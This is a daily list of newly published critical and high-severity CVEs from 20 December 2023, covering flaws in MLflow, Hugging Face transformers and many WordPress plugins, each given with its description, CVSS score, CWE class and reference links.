Latest vulnerabilities [Wednesday, December 20, 2023]


Last update performed on 12/20/2023 at 11:57:05 PM

(30) CRITICAL VULNERABILITIES [9.0, 10.0]

Source : huntr.dev

Vulnerability ID : CVE-2023-6975

First published on : 20-12-2023 06:15:45
Last modified on : 20-12-2023 13:50:15

Description :
A malicious user could use this issue to get command execution on the vulnerable machine and gain access to data and model information.

CVE ID : CVE-2023-6975
Source : security@huntr.dev
CVSS Score : 10.0

References :
https://github.com/mlflow/mlflow/commit/b9ab9ed77e1deda9697fe472fb1079fd428149ee | source : security@huntr.dev
https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85 | source : security@huntr.dev

Vulnerability : CWE-29


Vulnerability ID : CVE-2023-6977

First published on : 20-12-2023 06:15:45
Last modified on : 20-12-2023 13:50:15

Description :
This vulnerability enables malicious users to read sensitive files on the server.

CVE ID : CVE-2023-6977
Source : security@huntr.dev
CVSS Score : 10.0

References :
https://github.com/mlflow/mlflow/commit/4bd7f27c810ba7487d53ed5ef1038fca0f8dc28c | source : security@huntr.dev
https://huntr.com/bounties/fe53bf71-3687-4711-90df-c26172880aaf | source : security@huntr.dev

Vulnerability : CWE-29


Vulnerability ID : CVE-2023-7018

First published on : 20-12-2023 17:15:08
Last modified on : 20-12-2023 19:52:41

Description :
Deserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36.

CVE ID : CVE-2023-7018
Source : security@huntr.dev
CVSS Score : 9.6

References :
https://github.com/huggingface/transformers/commit/1d63b0ec361e7a38f1339385e8a5a855085532ce | source : security@huntr.dev
https://huntr.com/bounties/e1a3e548-e53a-48df-b708-9ee62140963c | source : security@huntr.dev

Vulnerability : CWE-502


Source : patchstack.com

Vulnerability ID : CVE-2023-49772

First published on : 20-12-2023 16:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Deserialization of Untrusted Data vulnerability in Phpbits Creative Studio Genesis Simple Love. This issue affects Genesis Simple Love: from n/a through 2.0.

CVE ID : CVE-2023-49772
Source : audit@patchstack.com
CVSS Score : 10.0

References :
https://patchstack.com/database/vulnerability/genesis-simple-love/wordpress-genesis-simple-love-plugin-2-0-unauthenticated-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-49773

First published on : 20-12-2023 16:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Deserialization of Untrusted Data vulnerability in Tim Brattberg BCorp Shortcodes. This issue affects BCorp Shortcodes: from n/a through 0.23.

CVE ID : CVE-2023-49773
Source : audit@patchstack.com
CVSS Score : 10.0

References :
https://patchstack.com/database/vulnerability/bcorp-shortcodes/wordpress-bcorp-shortcodes-plugin-0-23-unauthenticated-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-29384

First published on : 20-12-2023 19:15:08
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP. This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.0.

CVE ID : CVE-2023-29384
Source : audit@patchstack.com
CVSS Score : 10.0

References :
https://patchstack.com/database/vulnerability/jobwp/wordpress-job-board-and-recruitment-plugin-jobwp-plugin-2-0-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-25970

First published on : 20-12-2023 20:15:19
Last modified on : 20-12-2023 20:15:19

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Zendrop Zendrop – Global Dropshipping. This issue affects Zendrop – Global Dropshipping: from n/a through 1.0.0.

CVE ID : CVE-2023-25970
Source : audit@patchstack.com
CVSS Score : 10.0

References :
https://patchstack.com/database/vulnerability/zendrop-dropshipping-and-fulfillment/wordpress-zendrop-global-dropshipping-plugin-1-0-0-arbitrary-file-upload?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-31215

First published on : 20-12-2023 19:15:08
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in AmaderCode Lab Dropshipping & Affiliation with Amazon. This issue affects Dropshipping & Affiliation with Amazon: from n/a through 2.1.2.

CVE ID : CVE-2023-31215
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/wp-amazon-shop/wordpress-dropshipping-affiliation-with-amazon-plugin-2-1-2-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-31231

First published on : 20-12-2023 19:15:09
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates). This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 1.5.65.

CVE ID : CVE-2023-31231
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/unlimited-elements-for-elementor/wordpress-unlimited-elements-for-elementor-plugin-1-5-65-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-33318

First published on : 20-12-2023 19:15:09
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.40.

CVE ID : CVE-2023-33318
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/woocommerce-follow-up-emails/wordpress-woocommerce-follow-up-emails-plugin-4-9-40-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-34007

First published on : 20-12-2023 19:15:09
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in WPChill Download Monitor. This issue affects Download Monitor: from n/a through 4.8.3.

CVE ID : CVE-2023-34007
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/download-monitor/wordpress-download-monitor-plugin-4-8-3-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-34385

First published on : 20-12-2023 19:15:09
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Akshay Menariya Export Import Menus. This issue affects Export Import Menus: from n/a through 1.8.0.

CVE ID : CVE-2023-34385
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/export-import-menus/wordpress-export-import-menus-plugin-1-8-0-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-46149

First published on : 20-12-2023 19:15:10
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5.

CVE ID : CVE-2023-46149
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/themify-ultra/wordpress-themify-ultra-theme-7-3-3-authenticated-unrestricted-zip-extraction-lead-to-rce-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-23970

First published on : 20-12-2023 20:15:19
Last modified on : 20-12-2023 20:15:19

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in WooRockets Corsa. This issue affects Corsa: from n/a through 1.5.

CVE ID : CVE-2023-23970
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/corsa/wordpress-corsa-theme-1-5-arbitrary-file-upload?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-32590

First published on : 20-12-2023 15:15:08
Last modified on : 20-12-2023 16:47:25

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Daniel Söderström / Sidney van de Stouwe Subscribe to Category. This issue affects Subscribe to Category: from n/a through 2.7.4.

CVE ID : CVE-2023-32590
Source : audit@patchstack.com
CVSS Score : 9.3

References :
https://patchstack.com/database/vulnerability/subscribe-to-category/wordpress-subscribe-to-category-plugin-2-7-4-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-40010

First published on : 20-12-2023 15:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in realmag777 HUSKY – Products Filter for WooCommerce Professional. This issue affects HUSKY – Products Filter for WooCommerce Professional: from n/a through 1.3.4.2.

CVE ID : CVE-2023-40010
Source : audit@patchstack.com
CVSS Score : 9.3

References :
https://patchstack.com/database/vulnerability/woocommerce-products-filter/wordpress-husky-plugin-1-3-4-2-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-49776

First published on : 20-12-2023 16:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6.

CVE ID : CVE-2023-49776
Source : audit@patchstack.com
CVSS Score : 9.3

References :
https://patchstack.com/database/vulnerability/sayfa-sayac/wordpress-sayfa-sayac-plugin-2-6-unauthenticated-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-49752

First published on : 20-12-2023 18:15:13
Last modified on : 20-12-2023 19:52:34

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Spoon themes Adifier - Classified Ads WordPress Theme. This issue affects Adifier - Classified Ads WordPress Theme: from n/a before 3.1.4.

CVE ID : CVE-2023-49752
Source : audit@patchstack.com
CVSS Score : 9.3

References :
https://patchstack.com/database/vulnerability/adifier/wordpress-adifier-classified-ads-wordpress-theme-theme-3-9-3-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-28170

First published on : 20-12-2023 19:15:08
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Themely Theme Demo Import. This issue affects Theme Demo Import: from n/a through 1.1.1.

CVE ID : CVE-2023-28170
Source : audit@patchstack.com
CVSS Score : 9.1

References :
https://patchstack.com/database/vulnerability/theme-demo-import/wordpress-theme-demo-import-plugin-1-1-1-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-29102

First published on : 20-12-2023 19:15:08
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Olive Themes Olive One Click Demo Import. This issue affects Olive One Click Demo Import: from n/a through 1.1.1.

CVE ID : CVE-2023-29102
Source : audit@patchstack.com
CVSS Score : 9.1

References :
https://patchstack.com/database/vulnerability/olive-one-click-demo-import/wordpress-olive-one-click-demo-import-plugin-1-0-9-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-40204

First published on : 20-12-2023 19:15:09
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Premio Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager. This issue affects Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager: from n/a through 2.9.2.

CVE ID : CVE-2023-40204
Source : audit@patchstack.com
CVSS Score : 9.1

References :
https://patchstack.com/database/vulnerability/folders/wordpress-folders-plugin-2-9-2-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-49814

First published on : 20-12-2023 19:15:10
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Symbiostock symbiostock. This issue affects Symbiostock: from n/a through 6.0.0.

CVE ID : CVE-2023-49814
Source : audit@patchstack.com
CVSS Score : 9.1

References :
https://patchstack.com/database/vulnerability/symbiostock/wordpress-symbiostock-lite-plugin-6-0-0-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-45603

First published on : 20-12-2023 19:15:10
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Jeff Starr User Submitted Posts – Enable Users to Submit Posts from the Front End. This issue affects User Submitted Posts – Enable Users to Submit Posts from the Front End: from n/a through 20230902.

CVE ID : CVE-2023-45603
Source : audit@patchstack.com
CVSS Score : 9.0

References :
https://patchstack.com/database/vulnerability/user-submitted-posts/wordpress-user-submitted-posts-plugin-20230902-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Source : fluidattacks.com

Vulnerability ID : CVE-2023-5007

First published on : 20-12-2023 16:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'id' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.

CVE ID : CVE-2023-5007
Source : help@fluidattacks.com
CVSS Score : 9.8

References :
https://fluidattacks.com/advisories/kissin/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-5010

First published on : 20-12-2023 16:15:10
Last modified on : 20-12-2023 16:47:19

Description :
Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'coursecode' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.

CVE ID : CVE-2023-5010
Source : help@fluidattacks.com
CVSS Score : 9.8

References :
https://fluidattacks.com/advisories/kissin/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-5011

First published on : 20-12-2023 16:15:10
Last modified on : 20-12-2023 16:47:19

Description :
Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'coursename' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.

CVE ID : CVE-2023-5011
Source : help@fluidattacks.com
CVSS Score : 9.8

References :
https://fluidattacks.com/advisories/kissin/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-48433

First published on : 20-12-2023 21:15:07
Last modified on : 20-12-2023 21:15:07

Description :
Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the login_action.php resource does not validate the characters received and they are sent unfiltered to the database.

CVE ID : CVE-2023-48433
Source : help@fluidattacks.com
CVSS Score : 9.8

References :
https://fluidattacks.com/advisories/ma/ | source : help@fluidattacks.com
https://projectworlds.in/ | source : help@fluidattacks.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-48434

First published on : 20-12-2023 21:15:07
Last modified on : 20-12-2023 21:15:07

Description :
Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the reg_action.php resource does not validate the characters received and they are sent unfiltered to the database.

CVE ID : CVE-2023-48434
Source : help@fluidattacks.com
CVSS Score : 9.8

References :
https://fluidattacks.com/advisories/ma/ | source : help@fluidattacks.com
https://projectworlds.in/ | source : help@fluidattacks.com

Vulnerability : CWE-89


Source : hq.dhs.gov

Vulnerability ID : CVE-2023-50707

First published on : 20-12-2023 00:15:09
Last modified on : 20-12-2023 13:50:26

Description :
Through the exploitation of active user sessions, an attacker could send custom requests to cause a denial-of-service condition on the device.

CVE ID : CVE-2023-50707
Source : ics-cert@hq.dhs.gov
CVSS Score : 9.6

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-02 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-400


Source : incibe.es

Vulnerability ID : CVE-2023-6768

First published on : 20-12-2023 10:15:07
Last modified on : 20-12-2023 13:50:15

Description :
Authentication bypass vulnerability in Amazing Little Poll affecting versions 1.3 and 1.4. This vulnerability could allow an unauthenticated user to access the admin panel without providing any credentials by simply accessing the "lp_admin.php?adminstep=" parameter.

CVE ID : CVE-2023-6768
Source : cve-coordination@incibe.es
CVSS Score : 9.4

References :
https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amazing-little-poll | source : cve-coordination@incibe.es

Vulnerability : CWE-287


(35) HIGH VULNERABILITIES [7.0, 8.9]

Source : huntr.dev

Vulnerability ID : CVE-2023-6976

First published on : 20-12-2023 06:15:45
Last modified on : 20-12-2023 13:50:15

Description :
This vulnerability is capable of writing arbitrary files into arbitrary locations on the remote filesystem in the context of the server process.

CVE ID : CVE-2023-6976
Source : security@huntr.dev
CVSS Score : 8.8

References :
https://github.com/mlflow/mlflow/commit/5044878da0c1851ccfdd5c0a867157ed9a502fbc | source : security@huntr.dev
https://huntr.com/bounties/2408a52b-f05b-4cac-9765-4f74bac3f20f | source : security@huntr.dev

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-6974

First published on : 20-12-2023 06:15:45
Last modified on : 20-12-2023 13:50:15

Description :
A malicious user could use this issue to access internal HTTP(S) servers and, in the worst case (i.e., an AWS instance), it could be abused to get remote code execution on the victim machine.

CVE ID : CVE-2023-6974
Source : security@huntr.dev
CVSS Score : 8.6

References :
https://github.com/mlflow/mlflow/commit/8174250f83352a04c2d42079f414759060458555 | source : security@huntr.dev
https://huntr.com/bounties/438b0524-da0e-4d08-976a-6f270c688393 | source : security@huntr.dev

Vulnerability : CWE-918


Source : patchstack.com

Vulnerability ID : CVE-2023-47852

First published on : 20-12-2023 15:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Link Whisper Link Whisper Free. This issue affects Link Whisper Free: from n/a through 0.6.5.

CVE ID : CVE-2023-47852
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/link-whisper/wordpress-link-whisper-free-plugin-0-6-5-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-33209

First published on : 20-12-2023 16:15:08
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CrawlSpider SEO Change Monitor – Track Website Changes. This issue affects SEO Change Monitor – Track Website Changes: from n/a through 1.2.

CVE ID : CVE-2023-33209
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/seo-change-monitor/wordpress-seo-change-monitor-plugin-1-2-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-33330

First published on : 20-12-2023 16:15:08
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.50.

CVE ID : CVE-2023-33330
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/woocommerce-follow-up-emails/wordpress-woocommerce-follow-up-emails-plugin-4-9-50-follow-up-emails-manager-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-49825

First published on : 20-12-2023 16:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.

CVE ID : CVE-2023-49825
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/soledad/wordpress-soledad-theme-8-4-1-contributor-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-30495

First published on : 20-12-2023 17:15:07
Last modified on : 20-12-2023 19:52:41

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themefic Ultimate Addons for Contact Form 7. This issue affects Ultimate Addons for Contact Form 7: from n/a through 3.1.23.

CVE ID : CVE-2023-30495
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/ultimate-addons-for-contact-form-7/wordpress-ultimate-addons-for-contact-form-7-plugin-3-1-23-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-30750

First published on : 20-12-2023 17:15:07
Last modified on : 20-12-2023 19:52:41

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CreativeMindsSolutions CM Popup Plugin for WordPress. This issue affects CM Popup Plugin for WordPress: from n/a through 1.5.10.

CVE ID : CVE-2023-30750
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/cm-pop-up-banners/wordpress-cm-pop-up-banners-for-wordpress-plugin-1-5-10-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-29096

First published on : 20-12-2023 18:15:12
Last modified on : 20-12-2023 19:52:34

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BestWebSoft Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress. This issue affects Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress: from n/a through 1.7.0.

CVE ID : CVE-2023-29096
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/contact-form-to-db/wordpress-contact-form-to-db-by-bestwebsoft-plugin-1-7-0-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-47784

First published on : 20-12-2023 19:15:10
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in ThemePunch OHG Slider Revolution. This issue affects Slider Revolution: from n/a through 6.6.15.

CVE ID : CVE-2023-47784
Source : audit@patchstack.com
CVSS Score : 8.4

References :
https://patchstack.com/database/vulnerability/revslider/wordpress-slider-revolution-plugin-6-6-15-author-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-40555

First published on : 20-12-2023 14:15:20
Last modified on : 20-12-2023 14:33:33

Description :
Deserialization of Untrusted Data vulnerability in UX-themes Flatsome | Multi-Purpose Responsive WooCommerce Theme. This issue affects Flatsome | Multi-Purpose Responsive WooCommerce Theme: from n/a through 3.17.5.

CVE ID : CVE-2023-40555
Source : audit@patchstack.com
CVSS Score : 8.3

References :
https://patchstack.com/database/vulnerability/flatsome/wordpress-flatsome-theme-3-17-5-unauthenticated-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-28782

First published on : 20-12-2023 15:15:07
Last modified on : 20-12-2023 16:47:25

Description :
Deserialization of Untrusted Data vulnerability in Rocketgenius Inc. Gravity Forms. This issue affects Gravity Forms: from n/a through 2.7.3.

CVE ID : CVE-2023-28782
Source : audit@patchstack.com
CVSS Score : 8.3

References :
https://patchstack.com/database/vulnerability/gravityforms/wordpress-gravity-forms-plugin-2-7-3-unauthenticated-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-37871

First published on : 20-12-2023 14:15:19
Last modified on : 20-12-2023 14:33:33

Description :
Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce GoCardless. This issue affects GoCardless: from n/a through 2.5.6.

CVE ID : CVE-2023-37871
Source : audit@patchstack.com
CVSS Score : 8.2

References :
https://patchstack.com/database/vulnerability/woocommerce-gateway-gocardless/wordpress-woocommerce-gocardless-gateway-plugin-2-5-6-unauthenticated-insecure-direct-object-references-idor-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2023-29432

First published on : 20-12-2023 18:15:12
Last modified on : 20-12-2023 19:52:34

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Favethemes Houzez - Real Estate WordPress Theme. This issue affects Houzez - Real Estate WordPress Theme: from n/a before 2.8.3.

CVE ID : CVE-2023-29432
Source : audit@patchstack.com
CVSS Score : 8.2

References :
https://patchstack.com/database/vulnerability/houzez/wordpress-houzez-theme-2-8-3-unauth-sql-injection-sqli-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-35876

First published on : 20-12-2023 15:15:08
Last modified on : 20-12-2023 16:47:25

Description :
Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Square. This issue affects WooCommerce Square: from n/a through 3.8.1.

CVE ID : CVE-2023-35876
Source : audit@patchstack.com
CVSS Score : 8.1

References :
https://patchstack.com/database/vulnerability/woocommerce-square/wordpress-woocommerce-square-plugin-3-8-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2023-38519

First published on : 20-12-2023 14:15:19
Last modified on : 20-12-2023 14:33:33

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MainWP MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance. This issue affects MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance: from n/a through 4.4.3.3.

CVE ID : CVE-2023-38519
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/mainwp/wordpress-mainwp-plugin-4-4-3-3-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-47236

First published on : 20-12-2023 14:15:20
Last modified on : 20-12-2023 14:33:33

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Avirtum iPages Flipbook For WordPress. This issue affects iPages Flipbook For WordPress: from n/a through 1.4.8.

CVE ID : CVE-2023-47236
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/ipages-flipbook/wordpress-ipages-flipbook-for-wordpress-plugin-1-4-8-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-32743

First published on : 20-12-2023 16:15:07
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 5.7.1.

CVE ID : CVE-2023-32743
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/automatewoo/wordpress-automatewoo-plugin-5-7-1-shop-manager-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-35915

First published on : 20-12-2023 16:15:08
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0.

CVE ID : CVE-2023-35915
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/woocommerce-payments/wordpress-woocommerce-payments-plugin-5-9-0-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-30872

First published on : 20-12-2023 17:15:08
Last modified on : 20-12-2023 19:52:41

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BannerSky BSK Forms Blacklist. This issue affects BSK Forms Blacklist: from n/a through 3.6.2.

CVE ID : CVE-2023-30872
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/bsk-gravityforms-blacklist/wordpress-bsk-forms-blacklist-plugin-3-6-2-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-49161

First published on : 20-12-2023 18:15:12
Last modified on : 20-12-2023 19:52:34

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Guelben Bravo Translate. This issue affects Bravo Translate: from n/a through 1.2.

CVE ID : CVE-2023-49161
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/bravo-translate/wordpress-bravo-translate-plugin-1-2-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-49166

First published on : 20-12-2023 18:15:12
Last modified on : 20-12-2023 19:52:34

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Magic Logix MSync. This issue affects MSync: from n/a through 1.0.0.

CVE ID : CVE-2023-49166
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/msync/wordpress-msync-plugin-1-0-0-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-35914

First published on : 20-12-2023 16:15:08
Last modified on : 20-12-2023 16:47:19

Description :
Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce Woo Subscriptions. This issue affects Woo Subscriptions: from n/a through 5.1.2.

CVE ID : CVE-2023-35914
